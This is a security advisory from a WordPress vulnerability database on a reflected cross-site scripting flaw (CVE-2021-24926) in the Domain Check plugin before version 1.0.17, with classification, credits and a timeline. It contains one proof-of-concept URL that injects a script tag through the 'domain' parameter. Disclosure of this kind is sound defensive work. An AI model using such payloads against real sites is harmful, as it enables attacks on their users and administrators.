WordPress Plugin Vulnerabilities

Domain Check < 1.0.17 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the domain parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

https://example.com/wp-admin/admin.php?page=domain-check-profile&domain=<script>alert(/XSS/)</script>

Affects Plugins

Plugin icon
domain-check
Fixed in 1.0.17

References

CVE
CVE-2021-24926

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Ceylan Bozogullarindan
Submitter
Ceylan Bozogullarindan
Submitter website
https://bozogullarindan.com
Submitter twitter
CBozogullari
Verified
Yes
WPVDB ID
8cc7cbbd-f74f-4f30-9483-573641fea733

Timeline

Publicly Published
2021-12-28 (about 2 years ago)
Added
2021-12-28 (about 2 years ago)
Last Updated
2022-04-16 (about 2 years ago)

Other

Published
Title
Published
2023-05-11
Title
Slimstat Analytics < 5.0.5 - Reflected XSS
Published
2023-08-10
Title
Fusion Builder < 3.11.2 - Cross Site Scripting (XSS) vulnerability in the User Register element
Published
2014-08-01
Title
GroupDocs Document Annotation 1.3.8 - grpdocs-dialog.php Multiple Parameter XSS
Published
2017-12-18
Title
Share This Image <= 1.03 - Cross-Site Scripting (XSS)
Published
2015-08-25
Title
Anti-Spam by CleanTalk < 5.22 - Unauthenticated Reflected Cross-Site Scripting (XSS)